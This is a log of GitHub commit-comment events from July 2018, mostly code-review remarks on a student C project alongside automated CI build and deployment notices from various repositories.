{"id":"7932928920","type":"CommitCommentEvent","actor":{"login":"ferninator"},"repo":{"name":"ferninator/https-fegrushsummer2018.edublogs.org-p-3-preview-true"},"payload":{"comment":{"id":29630967,"position":null,"line":null,"path":null,"commit_id":"f967be57aa6c13a33fd04daa14d5501963dfd261","created_at":"2018-07-07T21:06:35Z","updated_at":"2018-07-07T21:06:35Z","author_association":"OWNER","body":"PU FS!"}},"created_at":"2018-07-07T21:06:35Z"}
{"id":"7932929092","type":"CommitCommentEvent","actor":{"login":"vlaidmeR"},"repo":{"name":"algolia/datasets"},"payload":{"comment":{"id":29630968,"position":61,"line":61,"path":"tedtalks/talks_popularity_score_desc_settings.json","commit_id":"c878cdd07ec8937da11a4c47c243b50d881f9038","created_at":"2018-07-07T21:06:45Z","updated_at":"2018-07-07T21:06:45Z","author_association":"NONE","body":"-\r\n"}},"created_at":"2018-07-07T21:06:45Z"}
{"id":"7932929483","type":"CommitCommentEvent","actor":{"login":"ferninator"},"repo":{"name":"ferninator/https-fegrushsummer2018.edublogs.org-p-3-preview-true"},"payload":{"comment":{"id":29630970,"position":null,"line":null,"path":null,"commit_id":"f967be57aa6c13a33fd04daa14d5501963dfd261","created_at":"2018-07-07T21:07:07Z","updated_at":"2018-07-07T21:07:07Z","author_association":"OWNER","body":"Getting serious about PU FS!"}},"created_at":"2018-07-07T21:07:07Z"}
{"id":"7932930011","type":"CommitCommentEvent","actor":{"login":"autoopsltd"},"repo":{"name":"autoopsltd/mergetest1"},"payload":{"comment":{"id":29630972,"position":null,"line":null,"path":null,"commit_id":"57df735b8d149bbe28788e97d54e2ca17d6a7679","created_at":"2018-07-07T21:07:33Z","updated_at":"2018-07-07T21:07:33Z","author_association":"OWNER","body":"added"}},"created_at":"2018-07-07T21:07:33Z"}
{"id":"7932930228","type":"CommitCommentEvent","actor":{"login":"Andarist"},"repo":{"name":"redux-saga/redux-saga"},"payload":{"comment":{"id":29630973,"position":12,"line":81,"path":"packages/core/src/internal/error-utils.js","commit_id":"9ed43b5e6faa6fac4b8db94362f17ed8e3d57332","created_at":"2018-07-07T21:07:46Z","updated_at":"2018-07-07T21:07:46Z","author_association":"MEMBER","body":"ok, got it, not sure if it's possible but MAYBE we could try to manipulate error's stack to make it pause at correct location"}},"created_at":"2018-07-07T21:07:46Z"}
{"id":"7932931245","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29630977,"position":null,"line":null,"path":null,"commit_id":"646f6f4c7a2e71f6d60000d2333c4a295d4b4c41","created_at":"2018-07-07T21:08:41Z","updated_at":"2018-07-07T21:08:41Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T21:08:41Z"}
{"id":"7932931417","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29630978,"position":2,"line":2,"path":"02-P-Dev_Tools/det.h","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:08:51Z","updated_at":"2018-07-07T21:08:51Z","author_association":"NONE","body":"Not an error, but an advise: Type names aren't required in function prototypes. If you ever decide to change the name, you'll have 2 places for changes instead of one. And specific parameters could be commented in some smart style (i.e. kernel-doc) to allow the end user to simply read about what function does and what it takes without the need to look into implementation\r\nWhat you choose depends on your personal coding style."}},"created_at":"2018-07-07T21:08:51Z"}
{"id":"7932932532","type":"CommitCommentEvent","actor":{"login":"virendra-pathak"},"repo":{"name":"JoeKan/stereoMatching"},"payload":{"comment":{"id":29630981,"position":55,"line":91,"path":"src/PrimalDual.cpp","commit_id":"bf544f754fd48b41e9babc0504ef6388460f2e99","created_at":"2018-07-07T21:09:56Z","updated_at":"2018-07-07T21:09:56Z","author_association":"COLLABORATOR","body":"Earlier q was 2x640x480 but not it is 640x480?"}},"created_at":"2018-07-07T21:09:56Z"}
{"id":"7932932710","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29630982,"position":null,"line":null,"path":null,"commit_id":"5aebfe9f22c36245afdb0918d251e9d086e9ee42","created_at":"2018-07-07T21:10:07Z","updated_at":"2018-07-07T21:10:07Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux|Win|macOS|\n|---|---|---|---|\n|Blender py36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-5aebfe9-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-5aebfe9-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-5aebfe9-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-5aebfe9-macos64.zip)|\n|IfcConvert| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-5aebfe9-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-5aebfe9-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-5aebfe9-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-5aebfe9-macos64.zip)|\n|IfcGeomServer| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-5aebfe9-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-5aebfe9-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-5aebfe9-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-5aebfe9-macos64.zip)|\n|Python 27| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-5aebfe9-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-5aebfe9-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-5aebfe9-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-5aebfe9-macos64.zip)|\n|Python 27u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-5aebfe9-linux64.zip)| | [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-5aebfe9-macos64.zip)|\n|Python 32| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-5aebfe9-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-5aebfe9-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-5aebfe9-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-5aebfe9-macos64.zip)|\n|Python 32u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-5aebfe9-linux64.zip)| | [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-5aebfe9-macos64.zip)|\n|Python 33| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-5aebfe9-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-5aebfe9-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-5aebfe9-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-5aebfe9-macos64.zip)|\n|Python 34| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-5aebfe9-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-5aebfe9-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-5aebfe9-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-5aebfe9-macos64.zip)|\n|Python 35| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-5aebfe9-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-5aebfe9-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-5aebfe9-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-5aebfe9-macos64.zip)|\n|Python 36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-5aebfe9-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-5aebfe9-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-5aebfe9-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-5aebfe9-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-5aebfe9-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-07T21:10:07Z"}
{"id":"7932933814","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29630983,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-07T21:11:08Z","updated_at":"2018-07-07T21:11:08Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-07T21:11:08Z"}
{"id":"7932934433","type":"CommitCommentEvent","actor":{"login":"rob-Hitchens"},"repo":{"name":"NateWickstrom/remittance-spolidity"},"payload":{"comment":{"id":29630984,"position":25,"line":37,"path":"contracts/Remittance.sol","commit_id":"31b07655a5cd05460484126dbcd1a7495598e4c4","created_at":"2018-07-07T21:11:39Z","updated_at":"2018-07-07T21:11:39Z","author_association":"NONE","body":"Maybe `bytes32 hashPass` to differentiate this password from the real password. "}},"created_at":"2018-07-07T21:11:39Z"}
{"id":"7932934609","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29630985,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-07T21:11:49Z","updated_at":"2018-07-07T21:11:49Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-07T21:11:49Z"}
{"id":"7932935910","type":"CommitCommentEvent","actor":{"login":"leouieda"},"repo":{"name":"GenericMappingTools/gmt-python"},"payload":{"comment":{"id":29630988,"position":4,"line":21,"path":"doc/conf.py","commit_id":"98ca37c5d897f886b8b73382ec8c6ed5cf0d2bb3","created_at":"2018-07-07T21:12:58Z","updated_at":"2018-07-07T21:12:58Z","author_association":"MEMBER","body":"Agreed. I'll put it back in my next PR."}},"created_at":"2018-07-07T21:12:58Z"}
{"id":"7932936522","type":"CommitCommentEvent","actor":{"login":"Elmurot"},"repo":{"name":"Elmurot/MyFirstGitRepo"},"payload":{"comment":{"id":29630989,"position":4,"line":4,"path":"Q&A","commit_id":"ed9f79e642d17b2afa3678ad053e1ff41830c04e","created_at":"2018-07-07T21:13:31Z","updated_at":"2018-07-07T21:13:31Z","author_association":"OWNER","body":"What is the difference between Maven and Java project?\r\nSo, the difference between Maven and Java project, Maven is the tool that manages all the dependencies and basically automates the built from starting the compiling it and it can test it can deploy it.\r\n\r\nPOM --> Project Object Model. From here you can manage all dependencies, and dependencies will be coming from some central repository. When you use it and push it or share someone else, nobody really have to do hard code. They will automatically have that in that project.    "}},"created_at":"2018-07-07T21:13:31Z"}
{"id":"7932936805","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29630991,"position":null,"line":null,"path":null,"commit_id":"28f81828b68aaef68846302974d7b9b0c4b45cf8","created_at":"2018-07-07T21:13:46Z","updated_at":"2018-07-07T21:13:46Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loons](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loons).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loons-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T21:13:46Z"}
{"id":"7932938716","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29630996,"position":8,"line":8,"path":"02-P-Dev_Tools/Makefile","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:15:31Z","updated_at":"2018-07-07T21:15:31Z","author_association":"NONE","body":"It's a good practice to have a delimiter between target and its prerequisites. Also prerequisites could be vertically aligned with tabs (sometimes good, sometimes not, depends on Makefile contents"}},"created_at":"2018-07-07T21:15:31Z"}
{"id":"7932938775","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29630997,"position":16,"line":16,"path":"02-P-Dev_Tools/Makefile","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:15:34Z","updated_at":"2018-07-07T21:15:34Z","author_association":"NONE","body":"`.PHONY` target is better declared somewhere in top of the Makefile.\r\nWhat happens if you need to build `all` target and have the file named `all` in your project directory?"}},"created_at":"2018-07-07T21:15:34Z"}
{"id":"7932938835","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29630998,"position":null,"line":null,"path":null,"commit_id":"d764ca6ab9358627c2fdcbefd40851dc74b850ba","created_at":"2018-07-07T21:15:37Z","updated_at":"2018-07-07T21:15:37Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2313 of 2313 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-07T21:15:37Z"}
{"id":"7932938898","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29630999,"position":1,"line":1,"path":"02-P-Dev_Tools/det.c","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:15:40Z","updated_at":"2018-07-07T21:15:40Z","author_association":"NONE","body":"There's no __det.h__ inclusion. What happens if you ever change your functions here to include, for example, some magic constants declared in header?"}},"created_at":"2018-07-07T21:15:40Z"}
{"id":"7932940481","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29631004,"position":null,"line":null,"path":null,"commit_id":"d764ca6ab9358627c2fdcbefd40851dc74b850ba","created_at":"2018-07-07T21:17:04Z","updated_at":"2018-07-07T21:17:04Z","author_association":"NONE","body":"157643005-ddress-limitations-and-overshooting-problem-using-ZTM1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d764ca6ab9358627c2fdcbefd40851dc74b850ba-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T21:17:04Z"}
{"id":"7932941220","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29631007,"position":4,"line":4,"path":"02-P-Dev_Tools/det.c","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:17:43Z","updated_at":"2018-07-07T21:17:43Z","author_association":"NONE","body":"A _tab_ should be 8 spaces, not 4. It's strange at a first glance, but required by kernel [CodingStyle](https://github.com/OleksiyTepliy/GlBaseCamp/files/2173094/CodingStyle1.pdf) and make sense when you're working with code for all day and get tired.\r\n"}},"created_at":"2018-07-07T21:17:43Z"}
{"id":"7932945263","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29631011,"position":null,"line":null,"path":null,"commit_id":"72907bbe78a7fe05343e89d61b754098d37f102b","created_at":"2018-07-07T21:21:29Z","updated_at":"2018-07-07T21:21:29Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-433](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-433).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-433-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-07T21:21:29Z"}
{"id":"7932945964","type":"CommitCommentEvent","actor":{"login":"cmmann"},"repo":{"name":"Dobbs-Lab/RPIDisorder"},"payload":{"comment":{"id":29631012,"position":null,"line":null,"path":null,"commit_id":"499bebce2e3a995aa46f188a19618cf810d7a5f3","created_at":"2018-07-07T21:22:10Z","updated_at":"2018-07-07T21:22:10Z","author_association":"CONTRIBUTOR","body":"Added information for interpreting results"}},"created_at":"2018-07-07T21:22:10Z"}
{"id":"7932947151","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29631015,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-07T21:23:19Z","updated_at":"2018-07-07T21:23:19Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-07T21:23:19Z"}
{"id":"7932947395","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29631016,"position":25,"line":25,"path":"02-P-Dev_Tools/main.c","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:23:35Z","updated_at":"2018-07-07T21:23:35Z","author_association":"NONE","body":"Defines should be placed in top of file to allow for easy modification.\r\nAlso, using `#ifdef`s for generalisation is ugly. If you have to distinguish the logic depending on macro-definition, separate the parts (for example, into two functions, `fill_args()` and `fill_rand()` and the third function `fill()` which includes the required implementation set by `#ifdef` definition)\r\nRead about it in [CodingStyle](https://github.com/OleksiyTepliy/GlBaseCamp/files/2173094/CodingStyle1.pdf)"}},"created_at":"2018-07-07T21:23:35Z"}
{"id":"7932953157","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"MrPlusGH/NPlusMiner"},"payload":{"comment":{"id":29631020,"position":null,"line":null,"path":null,"commit_id":"5c8d444a8dd02943db7226c4203f085c0bba2fb7","created_at":"2018-07-07T21:28:39Z","updated_at":"2018-07-07T21:28:39Z","author_association":"CONTRIBUTOR","body":"Why are you requesting Zergpools API price for Zpool? "}},"created_at":"2018-07-07T21:28:39Z"}
{"id":"7932954749","type":"CommitCommentEvent","actor":{"login":"theodoretripp"},"repo":{"name":"chingu-voyage5/Bears-Team-12"},"payload":{"comment":{"id":29631022,"position":29,"line":24,"path":"client/src/components/Menu.js","commit_id":"a91ddab326a9049214dee60d19973d9f33c108ee","created_at":"2018-07-07T21:30:10Z","updated_at":"2018-07-07T21:30:10Z","author_association":"CONTRIBUTOR","body":"This is where the newly created order's response data goes when the submit button is pressed.  It's used to get the order _id number and pass it to the orderReceipt component for lookup."}},"created_at":"2018-07-07T21:30:10Z"}
{"id":"7932956577","type":"CommitCommentEvent","actor":{"login":"DaddyCal"},"repo":{"name":"DaddyCal/Provenance"},"payload":{"comment":{"id":29631028,"position":2,"line":2,"path":".github/ISSUE_TEMPLATE/feature_request.md","commit_id":"aef53af970f6ca563039431626a9c5a44f33aa4d","created_at":"2018-07-07T21:31:37Z","updated_at":"2018-07-07T21:31:37Z","author_association":"OWNER","body":"Issue template"}},"created_at":"2018-07-07T21:31:37Z"}
{"id":"7932960454","type":"CommitCommentEvent","actor":{"login":"D00Med"},"repo":{"name":"D00Med/LegendofMinetest"},"payload":{"comment":{"id":29631037,"position":null,"line":null,"path":null,"commit_id":"4ccdd87e5ecf6efcbcb436afa0469e9a20bad97a","created_at":"2018-07-07T21:35:03Z","updated_at":"2018-07-07T21:35:03Z","author_association":"OWNER","body":"If I remember correctly, it will be possible in minetest 0.5"}},"created_at":"2018-07-07T21:35:03Z"}
{"id":"7932962052","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29631039,"position":null,"line":null,"path":null,"commit_id":"78b23b1d01d8b45add015c75a6f38236e151c4ab","created_at":"2018-07-07T21:36:22Z","updated_at":"2018-07-07T21:36:22Z","author_association":"OWNER","body":"LLR: 1.82 (-2.94,2.94) [0.00,5.00]\r\nTotal: 23609 W: 5265 L: 5068 D: 13276"}},"created_at":"2018-07-07T21:36:22Z"}
{"id":"7932962448","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29631040,"position":38,"line":38,"path":"02-P-Dev_Tools/main.c","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:36:43Z","updated_at":"2018-07-07T21:36:43Z","author_association":"NONE","body":"A better way of doing it.\r\n```C\r\nlong q = sqrt((double) (argc - 1));\r\nif (argc -1 != q*q) {\r\n        ....\r\n```"}},"created_at":"2018-07-07T21:36:43Z"}
{"id":"7932964027","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29631041,"position":47,"line":47,"path":"02-P-Dev_Tools/main.c","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:38:02Z","updated_at":"2018-07-07T21:38:02Z","author_association":"NONE","body":"A matrix of ints? Why not doubles?"}},"created_at":"2018-07-07T21:38:02Z"}
{"id":"7932964994","type":"CommitCommentEvent","actor":{"login":"elupus"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":29631042,"position":null,"line":null,"path":null,"commit_id":"34392db9e4eadb3ae31e5c7ca3542cb0291a02ad","created_at":"2018-07-07T21:38:56Z","updated_at":"2018-07-07T21:38:56Z","author_association":"CONTRIBUTOR","body":"Was this bransch really intended yo be pushed to main hass repo? And not to a personal account?\r\n\r\n@balloob might want to renovering this."}},"created_at":"2018-07-07T21:38:56Z"}
{"id":"7932967568","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29631048,"position":51,"line":51,"path":"02-P-Dev_Tools/main.c","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:41:17Z","updated_at":"2018-07-07T21:41:17Z","author_association":"NONE","body":"There's no need in `indx` variable. Compiler will optimize all out\r\n```C\r\nmat[i][j] = atoi(argv[i*n + j + 1);\r\n```"}},"created_at":"2018-07-07T21:41:17Z"}
{"id":"7932968106","type":"CommitCommentEvent","actor":{"login":"ivansg44"},"repo":{"name":"ivansg44/LexMapr"},"payload":{"comment":{"id":29631049,"position":null,"line":null,"path":null,"commit_id":"67524af0b89d466a0f8be98f7b130bb0ead8852a","created_at":"2018-07-07T21:41:50Z","updated_at":"2018-07-07T21:41:50Z","author_association":"OWNER","body":"Logging is not currently being used, and was making the builds jobs on Travis CI much slower."}},"created_at":"2018-07-07T21:41:50Z"}
{"id":"7932969334","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/amqp-feedstock"},"payload":{"comment":{"id":29631050,"position":null,"line":null,"path":null,"commit_id":"78195ab8287acf544aebc6dc389b262692bd7265","created_at":"2018-07-07T21:42:56Z","updated_at":"2018-07-07T21:42:56Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @wseaton were added to conda-forge. Welcome to conda-forge!\"\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @wseaton were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-07T21:42:56Z"}
{"id":"7932969726","type":"CommitCommentEvent","actor":{"login":"ivansg44"},"repo":{"name":"ivansg44/LexMapr"},"payload":{"comment":{"id":29631051,"position":null,"line":null,"path":null,"commit_id":"4151d7a20ca3e03f9409c3ff7e79ee5115cc109a","created_at":"2018-07-07T21:43:15Z","updated_at":"2018-07-07T21:43:15Z","author_association":"OWNER","body":"Ignore this commit; it was reverted."}},"created_at":"2018-07-07T21:43:15Z"}
{"id":"7932969800","type":"CommitCommentEvent","actor":{"login":"thodnev"},"repo":{"name":"OleksiyTepliy/GlBaseCamp"},"payload":{"comment":{"id":29631052,"position":76,"line":76,"path":"02-P-Dev_Tools/main.c","commit_id":"e2b866a4e660d320ff0b0852fbac806a5ff82d67","created_at":"2018-07-07T21:43:20Z","updated_at":"2018-07-07T21:43:20Z","author_association":"NONE","body":"You're measuring time with printf. The resulting time would include printf logic delay, parsing delay, and, whats more important, the terminal output delay."}},"created_at":"2018-07-07T21:43:20Z"}
{"id":"7932970631","type":"CommitCommentEvent","actor":{"login":"TobiaszZ"},"repo":{"name":"TobiaszZ/Warsztaty_1"},"payload":{"comment":{"id":29631053,"position":null,"line":null,"path":null,"commit_id":"113f3c87615318fc906fe6a8b868d95a06f0f777","created_at":"2018-07-07T21:44:07Z","updated_at":"2018-07-07T21:44:07Z","author_association":"OWNER","body":" @adam-kaczmarek-coderslab\r\nAdam Kaczmarek\r\nGeneralnie działa dla każdego wariantu. Nawet jak wpisze sie małe \"d\" . Występuje wyjątek tylko jak wpiszemy byle co . Jednak kod jest dosc długawy. Jakaś wskazówka co by można zrobić/użyć żeby skrócić kod? Pozdrawiam.\r\n\r\n\r\n"}},"created_at":"2018-07-07T21:44:07Z"}
{"id":"7932971252","type":"CommitCommentEvent","actor":{"login":"slashiee"},"repo":{"name":"slashiee/cemu_graphic_packs"},"payload":{"comment":{"id":29631055,"position":null,"line":null,"path":null,"commit_id":"d5ef8208fe852b75f24ba1c955b85aa89a28d099","created_at":"2018-07-07T21:44:41Z","updated_at":"2018-07-07T21:44:41Z","author_association":"OWNER","body":"Thank you for catching that"}},"created_at":"2018-07-07T21:44:41Z"}
